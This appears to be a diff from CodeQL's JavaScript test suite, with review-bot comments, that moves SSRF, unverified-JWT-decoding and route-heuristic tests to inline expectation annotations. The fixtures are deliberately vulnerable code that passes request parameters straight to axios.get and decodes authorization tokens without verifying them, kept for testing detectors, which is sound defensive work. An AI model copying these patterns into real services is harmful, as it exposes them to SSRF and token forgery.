@@ -48,10 +55,3 @@ nodes | jwtSimple.js:25:23:25:47 | req.hea ... ization | semmle.label | req.hea ... ization | | jwtSimple.js:28:23:28:31 | UserToken | semmle.label | UserToken | subpaths -#select -| JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:13:28:13:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:13:28:13:36 | UserToken | without signature verification | -| JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:20:28:20:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:20:28:20:36 | UserToken | without signature verification | -| JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:21:28:21:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:21:28:21:36 | UserToken | without signature verification | -| jose.js:11:23:11:47 | req.hea ... ization | jose.js:11:23:11:47 | req.hea ... ization | jose.js:13:20:13:28 | UserToken | Decoding JWT $@. | jose.js:13:20:13:28 | UserToken | without signature verification | -| jwtDecode.js:11:23:11:47 | req.hea ... ization | jwtDecode.js:11:23:11:47 | req.hea ... ization | jwtDecode.js:15:16:15:24 | UserToken | Decoding JWT $@. | jwtDecode.js:15:16:15:24 | UserToken | without signature verification | -| jwtSimple.js:10:23:10:47 | req.hea ... ization | jwtSimple.js:10:23:10:47 | req.hea ... ization | jwtSimple.js:13:23:13:31 | UserToken | Decoding JWT $@. | jwtSimple.js:13:23:13:31 | UserToken | without signature verification | diff --git a/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.qlref b/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.qlref index 9e7ea468ee79..d37a36dbcca3 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.qlref 
+++ b/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-347/decodeJwtWithoutVerification.ql \ No newline at end of file +query: experimental/Security/CWE-347/decodeJwtWithoutVerification.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/experimental/Security/CWE-347/remotesource/jose.js b/javascript/ql/test/experimental/Security/CWE-347/remotesource/jose.js index 30c57650e336..c2c36e88be80 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/remotesource/jose.js +++ b/javascript/ql/test/experimental/Security/CWE-347/remotesource/jose.js @@ -8,9 +8,9 @@ function getSecret() { } app.get('/jose1', (req, res) => { - const UserToken = req.headers.authorization; + const UserToken = req.headers.authorization; // $ Alert // no signature verification - jose.decodeJwt(UserToken) // NOT OK + jose.decodeJwt(UserToken) // NOT OK // $ Sink }) diff --git a/javascript/ql/test/experimental/Security/CWE-347/remotesource/jwtDecode.js b/javascript/ql/test/experimental/Security/CWE-347/remotesource/jwtDecode.js index 76a26e0df366..cb57c74a46ff 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/remotesource/jwtDecode.js +++ b/javascript/ql/test/experimental/Security/CWE-347/remotesource/jwtDecode.js @@ -8,11 +8,11 @@ function getSecret() { } app.get('/jwtDecode', (req, res) => { - const UserToken = req.headers.authorization; + const UserToken = req.headers.authorization; // $ Alert // jwt-decode // no signature verification - jwt_decode(UserToken) // NOT OK + jwt_decode(UserToken) // NOT OK // $ Sink }) app.listen(port, () => { diff --git a/javascript/ql/test/experimental/Security/CWE-347/remotesource/jwtSimple.js b/javascript/ql/test/experimental/Security/CWE-347/remotesource/jwtSimple.js index 4803309e3e55..9a015aa807d2 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/remotesource/jwtSimple.js 
+++ b/javascript/ql/test/experimental/Security/CWE-347/remotesource/jwtSimple.js @@ -7,10 +7,10 @@ function getSecret() { return "A Safe generated random key" } app.get('/jwtSimple1', (req, res) => { - const UserToken = req.headers.authorization; + const UserToken = req.headers.authorization; // $ Alert // no signature verification - jwt_simple.decode(UserToken, getSecret(), true); // NOT OK + jwt_simple.decode(UserToken, getSecret(), true); // NOT OK // $ Sink }) app.get('/jwtSimple2', (req, res) => { diff --git a/javascript/ql/test/experimental/Security/CWE-918/SSRF.expected b/javascript/ql/test/experimental/Security/CWE-918/SSRF.expected index 8a0dabd4c59e..0c79678c683f 100644 --- a/javascript/ql/test/experimental/Security/CWE-918/SSRF.expected +++ b/javascript/ql/test/experimental/Security/CWE-918/SSRF.expected 
@@ -1,3 +1,24 @@ +#select +| check-domain.js:17:13:17:15 | url | check-domain.js:16:15:16:27 | req.query.url | check-domain.js:17:13:17:15 | url | The URL of this request depends on a user-provided value. | +| check-domain.js:26:15:26:27 | req.query.url | check-domain.js:26:15:26:27 | req.query.url | check-domain.js:26:15:26:27 | req.query.url | The URL of this request depends on a user-provided value. | +| check-middleware.js:9:13:9:43 | "test.c ... tainted | check-middleware.js:9:27:9:43 | req.query.tainted | check-middleware.js:9:13:9:43 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-path.js:19:13:19:43 | 'test.c ... tainted | check-path.js:19:27:19:43 | req.query.tainted | check-path.js:19:13:19:43 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-path.js:23:13:23:45 | `/addre ... inted}` | check-path.js:23:27:23:43 | req.query.tainted | check-path.js:23:13:23:45 | `/addre ... inted}` | The URL of this request depends on a user-provided value. | +| check-path.js:33:15:33:45 | 'test.c ... tainted | check-path.js:33:29:33:45 | req.query.tainted | check-path.js:33:15:33:45 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-path.js:37:15:37:45 | 'test.c ... tainted | check-path.js:37:29:37:45 | req.query.tainted | check-path.js:37:15:37:45 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-path.js:45:13:45:44 | `${base ... inted}` | check-path.js:45:26:45:42 | req.query.tainted | check-path.js:45:13:45:44 | `${base ... inted}` | The URL of this request depends on a user-provided value. | +| check-regex.js:16:15:16:45 | "test.c ... tainted | check-regex.js:16:29:16:45 | req.query.tainted | check-regex.js:16:15:16:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:24:15:24:42 | baseURL ... 
tainted | check-regex.js:24:25:24:42 | req.params.tainted | check-regex.js:24:15:24:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:31:15:31:45 | "test.c ... tainted | check-regex.js:31:29:31:45 | req.query.tainted | check-regex.js:31:15:31:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:34:15:34:42 | baseURL ... tainted | check-regex.js:34:25:34:42 | req.params.tainted | check-regex.js:34:15:34:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:41:13:41:43 | "test.c ... tainted | check-regex.js:41:27:41:43 | req.query.tainted | check-regex.js:41:13:41:43 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:61:15:61:42 | baseURL ... tainted | check-regex.js:61:25:61:42 | req.params.tainted | check-regex.js:61:15:61:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:15:15:15:45 | "test.c ... tainted | check-validator.js:15:29:15:45 | req.query.tainted | check-validator.js:15:15:15:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:27:15:27:45 | "test.c ... tainted | check-validator.js:27:29:27:45 | req.query.tainted | check-validator.js:27:15:27:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:50:15:50:45 | "test.c ... tainted | check-validator.js:50:29:50:45 | req.query.tainted | check-validator.js:50:15:50:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:59:15:59:45 | "test.c ... tainted | check-validator.js:59:29:59:45 | req.query.tainted | check-validator.js:59:15:59:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:62:15:62:37 | "test.c ... 
mberURL | check-validator.js:54:21:54:37 | req.query.tainted | check-validator.js:62:15:62:37 | "test.c ... mberURL | The URL of this request depends on a user-provided value. | +| check-validator.js:68:15:68:45 | "test.c ... tainted | check-validator.js:68:29:68:45 | req.query.tainted | check-validator.js:68:15:68:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | edges | check-domain.js:16:9:16:11 | url | check-domain.js:17:13:17:15 | url | provenance | | | check-domain.js:16:15:16:27 | req.query.url | check-domain.js:16:9:16:11 | url | provenance | | 
@@ -65,24 +86,3 @@ nodes | check-validator.js:68:15:68:45 | "test.c ... tainted | semmle.label | "test.c ... tainted | | check-validator.js:68:29:68:45 | req.query.tainted | semmle.label | req.query.tainted | subpaths -#select -| check-domain.js:17:13:17:15 | url | check-domain.js:16:15:16:27 | req.query.url | check-domain.js:17:13:17:15 | url | The URL of this request depends on a user-provided value. | -| check-domain.js:26:15:26:27 | req.query.url | check-domain.js:26:15:26:27 | req.query.url | check-domain.js:26:15:26:27 | req.query.url | The URL of this request depends on a user-provided value. | -| check-middleware.js:9:13:9:43 | "test.c ... tainted | check-middleware.js:9:27:9:43 | req.query.tainted | check-middleware.js:9:13:9:43 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-path.js:19:13:19:43 | 'test.c ... tainted | check-path.js:19:27:19:43 | req.query.tainted | check-path.js:19:13:19:43 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-path.js:23:13:23:45 | `/addre ... inted}` | check-path.js:23:27:23:43 | req.query.tainted | check-path.js:23:13:23:45 | `/addre ... inted}` | The URL of this request depends on a user-provided value. | -| check-path.js:33:15:33:45 | 'test.c ... tainted | check-path.js:33:29:33:45 | req.query.tainted | check-path.js:33:15:33:45 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-path.js:37:15:37:45 | 'test.c ... tainted | check-path.js:37:29:37:45 | req.query.tainted | check-path.js:37:15:37:45 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-path.js:45:13:45:44 | `${base ... inted}` | check-path.js:45:26:45:42 | req.query.tainted | check-path.js:45:13:45:44 | `${base ... inted}` | The URL of this request depends on a user-provided value. | -| check-regex.js:16:15:16:45 | "test.c ... 
tainted | check-regex.js:16:29:16:45 | req.query.tainted | check-regex.js:16:15:16:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:24:15:24:42 | baseURL ... tainted | check-regex.js:24:25:24:42 | req.params.tainted | check-regex.js:24:15:24:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:31:15:31:45 | "test.c ... tainted | check-regex.js:31:29:31:45 | req.query.tainted | check-regex.js:31:15:31:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:34:15:34:42 | baseURL ... tainted | check-regex.js:34:25:34:42 | req.params.tainted | check-regex.js:34:15:34:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:41:13:41:43 | "test.c ... tainted | check-regex.js:41:27:41:43 | req.query.tainted | check-regex.js:41:13:41:43 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:61:15:61:42 | baseURL ... tainted | check-regex.js:61:25:61:42 | req.params.tainted | check-regex.js:61:15:61:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:15:15:15:45 | "test.c ... tainted | check-validator.js:15:29:15:45 | req.query.tainted | check-validator.js:15:15:15:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:27:15:27:45 | "test.c ... tainted | check-validator.js:27:29:27:45 | req.query.tainted | check-validator.js:27:15:27:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:50:15:50:45 | "test.c ... tainted | check-validator.js:50:29:50:45 | req.query.tainted | check-validator.js:50:15:50:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:59:15:59:45 | "test.c ... 
tainted | check-validator.js:59:29:59:45 | req.query.tainted | check-validator.js:59:15:59:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:62:15:62:37 | "test.c ... mberURL | check-validator.js:54:21:54:37 | req.query.tainted | check-validator.js:62:15:62:37 | "test.c ... mberURL | The URL of this request depends on a user-provided value. | -| check-validator.js:68:15:68:45 | "test.c ... tainted | check-validator.js:68:29:68:45 | req.query.tainted | check-validator.js:68:15:68:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | diff --git a/javascript/ql/test/experimental/Security/CWE-918/SSRF.qlref b/javascript/ql/test/experimental/Security/CWE-918/SSRF.qlref index 05a9c8145e60..7819b4827f28 100644 --- a/javascript/ql/test/experimental/Security/CWE-918/SSRF.qlref +++ b/javascript/ql/test/experimental/Security/CWE-918/SSRF.qlref @@ -1 +1,2 @@ -./experimental/Security/CWE-918/SSRF.ql \ No newline at end of file +query: ./experimental/Security/CWE-918/SSRF.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/experimental/Security/CWE-918/check-domain.js b/javascript/ql/test/experimental/Security/CWE-918/check-domain.js index 0821140ab5fe..4559d14e8036 100644 --- a/javascript/ql/test/experimental/Security/CWE-918/check-domain.js +++ b/javascript/ql/test/experimental/Security/CWE-918/check-domain.js @@ -13,8 +13,8 @@ const app = express(); app.get('/check-with-axios', req => { // without validation - const url = req.query.url; - axios.get(url); //SSRF + const url = req.query.url; // $ Source + axios.get(url); //SSRF // $ Alert // validating domain only const decodedURI = decodeURIComponent(req.query.url); @@ -23,7 +23,7 @@ app.get('/check-with-axios', req => { const { hostname } = url.parse(decodedURI); if (isValidDomain(hostname, validDomains)) { - axios.get(req.query.url); //SSRF + axios.get(req.query.url); //SSRF // $ Alert } }); 
diff --git a/javascript/ql/test/experimental/Security/CWE-918/check-middleware.js b/javascript/ql/test/experimental/Security/CWE-918/check-middleware.js index 2a1e6d541665..721250e80afd 100644 --- a/javascript/ql/test/experimental/Security/CWE-918/check-middleware.js +++ b/javascript/ql/test/experimental/Security/CWE-918/check-middleware.js @@ -6,7 +6,7 @@ const express = require('express'); const app = express(); app.get('/check-with-axios', validationMiddleware, req => { - axios.get("test.com/" + req.query.tainted); // OK is sanitized by the middleware - False Positive + axios.get("test.com/" + req.query.tainted); // OK is sanitized by the middleware - False Positive // $ Alert }); diff --git a/javascript/ql/test/experimental/Security/CWE-918/check-path.js b/javascript/ql/test/experimental/Security/CWE-918/check-path.js index b26e4924460f..9888a28b383c 100644 --- a/javascript/ql/test/experimental/Security/CWE-918/check-path.js +++ b/javascript/ql/test/experimental/Security/CWE-918/check-path.js @@ -16,11 +16,11 @@ app.get('/check-with-axios', req => { const hardcoded = 'hardcodeado'; axios.get('test.com/' + hardcoded); // OK - axios.get('test.com/' + req.query.tainted); // SSRF + axios.get('test.com/' + req.query.tainted); // SSRF // $ Alert axios.get('test.com/' + Number(req.query.tainted)); // OK axios.get('test.com/' + req.user.id); // OK axios.get('test.com/' + encodeURIComponent(req.query.tainted)); // OK - axios.get(`/addresses/${req.query.tainted}`); // SSRF + axios.get(`/addresses/${req.query.tainted}`); // SSRF // $ Alert axios.get(`/addresses/${encodeURIComponent(req.query.tainted)}`); // OK if (Number.isInteger(req.query.tainted)) { 
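Review bot: In check-middleware.js the `axios.get("test.com/" + req.query.tainted)` call is commented as sanitized by the middleware and a false positive, yet the new annotation is a plain `// $ Alert`, which records the result as wanted. The inline-expectations syntax has a marker for known-wrong results, so I would write `// OK - sanitized by the middleware // $ SPURIOUS: Alert`. The test should still pass today, and it will flag the line once the SSRF query recognises the middleware. The same applies to the `OK - False Positive` line in check-regex.js and the four `OK. False Positive` lines in check-validator.js. Without that distinction a reader triaging SSRF results cannot tell from the test which alerts are intended.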
@@ -30,11 +30,11 @@ app.get('/check-with-axios', req => { if (isValidInput(req.query.tainted)){ axios.get('test.com/' + req.query.tainted); // OK } else { - axios.get('test.com/' + req.query.tainted); // SSRF + axios.get('test.com/' + req.query.tainted); // SSRF // $ Alert } if (doesntCheckAnything(req.query.tainted)) { - axios.get('test.com/' + req.query.tainted); // SSRF + axios.get('test.com/' + req.query.tainted); // SSRF // $ Alert } if (isValidPath(req.query.tainted, VALID_PATHS)) { @@ -42,7 +42,7 @@ app.get('/check-with-axios', req => { } let baseURL = require('config').base - axios.get(`${baseURL}${req.query.tainted}`); // SSRF + axios.get(`${baseURL}${req.query.tainted}`); // SSRF // $ Alert if(!isValidInput(req.query.tainted)) { return; diff --git a/javascript/ql/test/experimental/Security/CWE-918/check-regex.js b/javascript/ql/test/experimental/Security/CWE-918/check-regex.js index 238aa9068432..f5b4f908e636 100644 --- a/javascript/ql/test/experimental/Security/CWE-918/check-regex.js +++ b/javascript/ql/test/experimental/Security/CWE-918/check-regex.js @@ -13,7 +13,7 @@ app.get('/check-with-axios', req => { axios.get("test.com/" + req.query.tainted); // OK } if (req.query.tainted.match(/^.*$/)) { // anything - axios.get("test.com/" + req.query.tainted); // SSRF - False Negative + axios.get("test.com/" + req.query.tainted); // SSRF - False Negative // $ Alert } const baseURL = "test.com/" 
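Review bot: The `.match(/^.*$/)` branch in check-regex.js is still commented `SSRF - False Negative`, but the added `// $ Alert` and the check-regex.js:16 row in SSRF.expected show that the query does report this call. The comment now contradicts the expectation, so I would change the line to `axios.get("test.com/" + req.query.tainted); // SSRF: the regex accepts any input // $ Alert`. The handler body continues outside this hunk.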
@@ -21,24 +21,24 @@ app.get('/check-with-axios', req => { axios.get(baseURL + req.params.tainted); // OK } if (!isValidPath(req.params.tainted) ) { - axios.get(baseURL + req.params.tainted); // SSRF + axios.get(baseURL + req.params.tainted); // SSRF // $ Alert } else { axios.get(baseURL + req.params.tainted); // OK } // Blacklists are not safe if (!req.query.tainted.match(/^[/\.%]+$/)) { - axios.get("test.com/" + req.query.tainted); // SSRF + axios.get("test.com/" + req.query.tainted); // SSRF // $ Alert } if (!isInBlacklist(req.params.tainted) ) { - axios.get(baseURL + req.params.tainted); // SSRF + axios.get(baseURL + req.params.tainted); // SSRF // $ Alert } if (!isValidPath(req.params.tainted)) { return; } - axios.get("test.com/" + req.query.tainted); // OK - False Positive + axios.get("test.com/" + req.query.tainted); // OK - False Positive // $ Alert if (req.query.tainted.matchAll(/^[0-9a-z]+$/g)) { // letters and numbers axios.get("test.com/" + req.query.tainted); // OK @@ -58,7 +58,7 @@ app.get('/check-with-axios', req => { axios.get(baseURL + req.params.tainted); // OK } if (!isValidPathMatchAll(req.params.tainted) ) { - axios.get(baseURL + req.params.tainted); // NOT OK - SSRF + axios.get(baseURL + req.params.tainted); // NOT OK - SSRF // $ Alert } else { axios.get(baseURL + req.params.tainted); // OK } diff --git a/javascript/ql/test/experimental/Security/CWE-918/check-validator.js b/javascript/ql/test/experimental/Security/CWE-918/check-validator.js index dfe3314b07b3..1e170036c44a 100644 --- a/javascript/ql/test/experimental/Security/CWE-918/check-validator.js +++ b/javascript/ql/test/experimental/Security/CWE-918/check-validator.js 
@@ -12,7 +12,7 @@ app.get("/check-with-axios", req => { axios.get("test.com/" + req.query.tainted); // OK } if (isAlphanumeric(req.query.tainted)) { - axios.get("test.com/" + req.query.tainted); // SSRF + axios.get("test.com/" + req.query.tainted); // SSRF // $ Alert } if (validAlphanumeric(req.query.tainted)) { axios.get("test.com/" + req.query.tainted); // OK @@ -24,7 +24,7 @@ app.get("/check-with-axios", req => { axios.get("test.com/" + req.query.tainted); // OK } if (wrongValidation(req.query.tainted)) { - axios.get("test.com/" + req.query.tainted); // SSRF + axios.get("test.com/" + req.query.tainted); // SSRF // $ Alert } // numbers @@ -47,25 +47,25 @@ app.get("/check-with-axios", req => { axios.get("test.com/" + req.query.tainted); // OK } if (validHexa(req.query.tainted)) { - axios.get("test.com/" + req.query.tainted); // OK. False Positive + axios.get("test.com/" + req.query.tainted); // OK. False Positive // $ Alert } // with simple assignation - const numberURL = req.query.tainted; + const numberURL = req.query.tainted; // $ Source if (validNumber(numberURL)) { axios.get("test.com/" + numberURL); // OK } if (validNumber(numberURL)) { - axios.get("test.com/" + req.query.tainted); // OK. False Positive + axios.get("test.com/" + req.query.tainted); // OK. False Positive // $ Alert } if (validNumber(req.query.tainted)) { - axios.get("test.com/" + numberURL); // OK. False Positive + axios.get("test.com/" + numberURL); // OK. False Positive // $ Alert } if (validHexadecimal(req.query.tainted) || validHexaColor(req.query.tainted) || validDecimal(req.query.tainted) || validFloat(req.query.tainted) || validInt(req.query.tainted) || validNumber(req.query.tainted) || validOctal(req.query.tainted)) { - axios.get("test.com/" + req.query.tainted); // OK. False Positive + axios.get("test.com/" + req.query.tainted); // OK. False Positive // $ Alert } }); 
diff --git a/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/MultipleArgumentsToSetConstructor.qlref b/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/MultipleArgumentsToSetConstructor.qlref index 3cba54a3a0c5..51cb2f3db8ba 100644 --- a/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/MultipleArgumentsToSetConstructor.qlref +++ b/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/MultipleArgumentsToSetConstructor.qlref @@ -1 +1,2 @@ -experimental/StandardLibrary/MultipleArgumentsToSetConstructor.ql +query: experimental/StandardLibrary/MultipleArgumentsToSetConstructor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/MultipleArgumentsToSetConstructorBad.js b/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/MultipleArgumentsToSetConstructorBad.js index 4bce4b54c1b4..ea51918032a2 100644 --- a/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/MultipleArgumentsToSetConstructorBad.js +++ b/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/MultipleArgumentsToSetConstructorBad.js @@ -1,4 +1,4 @@ -const vowels = new Set('a', 'e', 'i', 'o', 'u'); +const vowels = new Set('a', 'e', 'i', 'o', 'u'); // $ Alert function isVowel(char) { return vowels.has(char.toLowerCase()); diff --git a/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/tst.js b/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/tst.js index 7f43ae5f9664..024c881ce4a9 100644 --- a/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/tst.js +++ b/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/tst.js 
@@ -1,6 +1,6 @@ let xs = [1, 2, 3]; let ys = [4, 5, 6]; -new Set(...xs, ...ys); // NOT OK +new Set(...xs, ...ys); // NOT OK // $ Alert new Set([...xs, ...ys]); // OK new Set(xs); // OK new Set(); // OK \ No newline at end of file diff --git a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/UnpromotedRouteHandlerCandidate.qlref b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/UnpromotedRouteHandlerCandidate.qlref index 51fb87eed725..c383d032bc09 100644 --- a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/UnpromotedRouteHandlerCandidate.qlref +++ b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/UnpromotedRouteHandlerCandidate.qlref @@ -1 +1,2 @@ -meta/analysis-quality/UnpromotedRouteHandlerCandidate.ql \ No newline at end of file +query: meta/analysis-quality/UnpromotedRouteHandlerCandidate.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/UnpromotedRouteSetupCandidate.qlref b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/UnpromotedRouteSetupCandidate.qlref index 5ce57dc19ba9..2ef54efcfd0a 100644 --- a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/UnpromotedRouteSetupCandidate.qlref +++ b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/UnpromotedRouteSetupCandidate.qlref @@ -1 +1,2 @@ -meta/analysis-quality/UnpromotedRouteSetupCandidate.ql \ No newline at end of file +query: meta/analysis-quality/UnpromotedRouteSetupCandidate.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/hapi.js b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/hapi.js index 581e2401e05e..9ea46e7ce68f 100644 --- a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/hapi.js +++ b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/hapi.js 
@@ -1 +1 @@ -function handler(request, h){} +function handler(request, h){} // $ Alert[js/unpromoted-route-handler-candidate] diff --git a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/nodejs.js b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/nodejs.js index 57bcde69d531..315c6dd1379b 100644 --- a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/nodejs.js +++ b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/nodejs.js @@ -2,14 +2,14 @@ var http = require('http'); http.createServer(function(req, res){}); -unknown.createServer(function(req, res){}); +unknown.createServer(function(req, res){}); // $ Alert[js/unpromoted-route-setup-candidate] var createServer = http.createServer; createServer(function(req, res){}); http.createServer().on("request", function(req, res){}); -unknown.on("request", function(req, res){}); -unknown.once("request", function(req, res){}); +unknown.on("request", function(req, res){}); // $ Alert[js/unpromoted-route-setup-candidate] +unknown.once("request", function(req, res){}); // $ Alert[js/unpromoted-route-setup-candidate] function getHandler(){ return function(req, res){}; diff --git a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/route-objects.js b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/route-objects.js index 64dbe4555600..2abb91d0f11b 100644 --- a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/route-objects.js +++ b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/route-objects.js @@ -4,10 +4,10 @@ var app = express(); var route1 = { method: 'post', url: '/foo', - middleWares: [function(req, res){}], + middleWares: [function(req, res){}], // $ Alert[js/unpromoted-route-handler-candidate] handler(req, res) { - } + } // $ Alert[js/unpromoted-route-handler-candidate] }; app[route1.method](route1.url, route1.middleWares, route1.handler); 
@@ -19,14 +19,14 @@ var routes = [ url: '/foo', handler(req, res) { - } + } // $ Alert[js/unpromoted-route-handler-candidate] }, { method: 'post', url: '/foo', handler(req, res) { - } + } // $ Alert[js/unpromoted-route-handler-candidate] } ]; routes.forEach((route) => { @@ -39,7 +39,7 @@ var route2 = { url: '/foo', handler(req, res) { - } + } // $ Alert[js/unpromoted-route-handler-candidate] }; app[route2.method.toLowerCase()](route2.url, route2.handler); @@ -49,13 +49,13 @@ var route3 = { url: '/foo', handler(req, res) { - } + } // $ Alert[js/unpromoted-route-handler-candidate] }; function wrap(f){ return function(req, res){ f(req); - } + } // $ Alert[js/unpromoted-route-handler-candidate] } app[route3.method](route3.url, wrap(route3.handler)); confuse(wrap); // confuse the type inference diff --git a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/tst.js b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/tst.js index e2d6cfd1ebf0..871ddf9603b7 100644 --- a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/tst.js +++ b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/tst.js @@ -3,9 +3,9 @@ var app = express(); app.get('/some/path', function(req, res) {}) -someOtherApp.get('/some/path', function(req, res) {}) +someOtherApp.get('/some/path', function(req, res) {}) // $ Alert[js/unpromoted-route-setup-candidate] -someOtherApp.get('/some/path', function(request, response) {}) +someOtherApp.get('/some/path', function(request, response) {}) // $ Alert[js/unpromoted-route-setup-candidate] someOtherApp.get('/some/path', function(r) { r.acceptsCharsets() 
@@ -27,23 +27,23 @@ someOtherApp.get('/some/path', function(r, s, n) { n('route') }) -someOtherApp.delete('/some/path', function(req, res) {}) +someOtherApp.delete('/some/path', function(req, res) {}) // $ Alert[js/unpromoted-route-setup-candidate] someOtherApp.get('/some/path', function(req, res) {}, - function(req, res) {}) + function(req, res) {}) // $ Alert[js/unpromoted-route-setup-candidate] someOtherApp.get('/some/path', [ function(req, res) {}, function(req, res) {} -]) +]) // $ Alert[js/unpromoted-route-setup-candidate] someOtherApp.get('/some/path', function() {}, - function(req, res) {}) + function(req, res) {}) // $ Alert[js/unpromoted-route-setup-candidate] -function f(req, res) {} +function f(req, res) {} // $ Alert[js/unpromoted-route-handler-candidate] function f(ctx, next) { ctx.acceptsCharsets() @@ -51,25 +51,25 @@ function f(ctx, next) { function f(req, res) { req() -} +} // $ Alert[js/unpromoted-route-handler-candidate] function called(req,res) { -} +} // $ Alert[js/unpromoted-route-handler-candidate] called() function f(req,res) { return; -} +} // $ Alert[js/unpromoted-route-handler-candidate] function f(req,res) { return x; -} +} // $ Alert[js/unpromoted-route-handler-candidate] function adHocTestsFor_HeuristicRouteHandler() { function rh_dead(req, res) { - } + } // $ Alert[js/unpromoted-route-handler-candidate] function rh_flowToSetup(req, res) { @@ -84,7 +84,7 @@ function adHocTestsFor_HeuristicRouteHandler() { function rh_flowToHeuristicSetup(req, res) { } - unknownApp.get('/some/path', rh_flowToHeuristicSetup) + unknownApp.get('/some/path', rh_flowToHeuristicSetup) // $ Alert[js/unpromoted-route-setup-candidate] } function adHocTestsFor_HeuristicRouteSetups() { 
